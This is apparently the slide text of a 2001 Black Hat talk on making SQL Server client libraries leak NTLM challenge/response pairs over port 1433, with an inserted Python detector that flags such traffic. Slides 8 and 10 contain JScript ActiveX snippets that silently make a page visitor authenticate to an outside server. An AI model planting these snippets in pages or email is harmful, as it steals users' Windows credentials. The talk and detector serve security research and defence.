Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…
  1. Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…
     Timothy M. Mullen, AnchorIS.Com, Inc. thor@hammerofgod.com
     Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

  2. The Culprit: SQL2000 Super Sockets Lib
     • New functions in dbnetlib.dll!
     • Supports TCP/IP Sockets, encryption, authentication, etc.
     • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)

  3. Backgrounders…
     • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)
     • Integrated Authentication (NTLM creds) needed Named Pipes
     • Named Pipes required 139/445 open to the authenticating system.

  4. Backgrounders… cont.
     • Integrated Authentication has _always_ been the recommended configuration.
     • 139/445 has long been blocked at the router (if not, you are a yum-yum.)
     • Many server-to-server apps authenticate over TCP 1433 because it is “safe”.

  5. The Skinny
     • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
     • The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports, if changed).

  6. The Problem
     • Many routers, though specifically blocking 139/445, still allow established traffic out, i.e. 1433 outbound is free to pass.
     • Many have 1433 explicitly open for application support, server-to-server queries, etc.
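The defensive counterpart to slides 5 and 6 is to watch the channel itself: an NTLM AUTHENTICATE (Type 3) message carried inside a client-to-server TCP 1433 stream to a destination that is not one of your approved SQL servers is exactly the “creds on the back channel” event the talk describes. The following detector is an added example and is not part of the presentation or of any product it mentions. It assumes you already have reassembled client-to-server payloads per flow (from a sensor or pcap tool), it does not parse TDS framing but simply locates the NTLMSSP signature in the stream, and the internal ranges, approved-server list and sample flows are constructed for the example (203.0.113.0/24 is a documentation range used here to stand for an outside host).

```python
"""Flag NTLM AUTHENTICATE messages leaving over TCP 1433 to non-approved servers."""
import struct
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

NTLMSSP_SIG = b"NTLMSSP\x00"          # every NTLMSSP message starts with this
NTLM_AUTHENTICATE = 3                  # message type that carries the LM/NT responses
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001 # flag: string fields are UTF-16LE

# Assumptions for this example: the site's internal ranges and approved SQL servers.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
ALLOWED_SQL_SERVERS = {"10.2.0.5"}


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    payload: bytes  # reassembled client->server bytes of one TCP connection


def _field(msg: bytes, off: int) -> bytes:
    """Read an NTLM (len, maxlen, offset) security-buffer descriptor and return its data."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def parse_ntlm_authenticate(msg: bytes):
    """Return (domain, user, workstation) for an AUTHENTICATE message, else None."""
    if not msg.startswith(NTLMSSP_SIG) or len(msg) < 64:
        return None
    if struct.unpack_from("<I", msg, 8)[0] != NTLM_AUTHENTICATE:
        return None
    # Fixed layout: LM resp @12, NT resp @20, Domain @28, User @36, Workstation @44,
    # session key @52, NegotiateFlags @60.
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    return (_field(msg, 28).decode(enc), _field(msg, 36).decode(enc), _field(msg, 44).decode(enc))


def find_ntlm_messages(payload: bytes):
    """Yield each NTLMSSP message found in a byte stream (TDS framing is not parsed)."""
    start = 0
    while (idx := payload.find(NTLMSSP_SIG, start)) >= 0:
        yield payload[idx:]  # offsets inside the message are relative to its start
        start = idx + len(NTLMSSP_SIG)


def inspect_flow(flow: Flow, allowed=ALLOWED_SQL_SERVERS):
    """Return an alert dict if this 1433 flow carries NTLM AUTHENTICATE to a non-approved host."""
    if flow.dport != 1433 or flow.dst in allowed:
        return None
    for msg in find_ntlm_messages(flow.payload):
        parsed = parse_ntlm_authenticate(msg)
        if parsed is None:
            continue
        domain, user, workstation = parsed
        dst = ip_address(flow.dst)
        return {
            "src": flow.src, "dst": flow.dst, "domain": domain, "user": user,
            "workstation": workstation,
            "external": not any(dst in net for net in INTERNAL_NETS),
        }
    return None


def build_authenticate(domain: str, user: str, workstation: str) -> bytes:
    """Construct a minimal AUTHENTICATE message as a test fixture (responses are zero-filled)."""
    enc = "utf-16-le"
    items = [b"\x00" * 24, b"\x00" * 24, domain.encode(enc), user.encode(enc), workstation.encode(enc), b""]
    fields, data, offset = b"", b"", 64
    for item in items:
        fields += struct.pack("<HHI", len(item), len(item), offset)
        data += item
        offset += len(item)
    return NTLMSSP_SIG + struct.pack("<I", NTLM_AUTHENTICATE) + fields + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + data


# Constructed sample flows; the 8 leading zero bytes stand in for a TDS packet header.
SAMPLE_FLOWS = [
    Flow("10.0.5.23", "10.2.0.5", 1433, b"\x00" * 8 + build_authenticate("CORP", "svc_report", "WS01")),
    Flow("10.0.5.23", "203.0.113.7", 1433, b"\x00" * 8 + build_authenticate("CORP", "jdoe", "WS01")),
    Flow("10.0.5.23", "203.0.113.7", 443, b"GET / HTTP/1.1\r\n"),
]


def run(flows=SAMPLE_FLOWS):
    """Return the alerts raised over a list of flows."""
    return [a for a in (inspect_flow(f) for f in flows) if a]


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Only the second flow raises an alert: an approved server is exempt, port 443 is ignored, and the alert names the account whose LM/NT response left for an outside host, which is what an incident responder needs to reset first. Reading the workstation and user from the Type 3 message rather than from the TDS login record keeps the check valid for any other protocol that tunnels NTLMSSP.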

  7. The Sting
     • Client side ODBC connections can specify the target server, authentication type, and the library to use.
     • Web sites can request the client to perform ADODB recordset requests, as well as other tasks.
     • HTML email as well.

  8. Somewhat Lame Example
     • Web site with the following tag:
         {
           conn = new ActiveXObject("ADODB.Connection");
           conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
           conn.Open();
         }

  9. Example Cont…
     • User is presented with the “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
     • Easily engineered around…

  10. Not So Lame Example
     • Let’s try this one:
         {
           ns = new ActiveXObject("SQLNS.SQLNamespace");
           ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
         }

  11. What’s the difference?
     • SQLNamespace, SQL Distribution Control, and SQL Merge Control are all scriptable, and are marked _safe for scripting_!
     • Silently grab the creds for fun and profit!

  12. Live Demo
     • Don’t try this at home! Professional driver on closed course.

  13. Thanks!
     AnchorIS.Com – www.anchoris.com
     HammerofGod – www.hammerofgod.com
     Timothy M. Mullen – tmullen@anchoris.com, thor@hammerofgod.com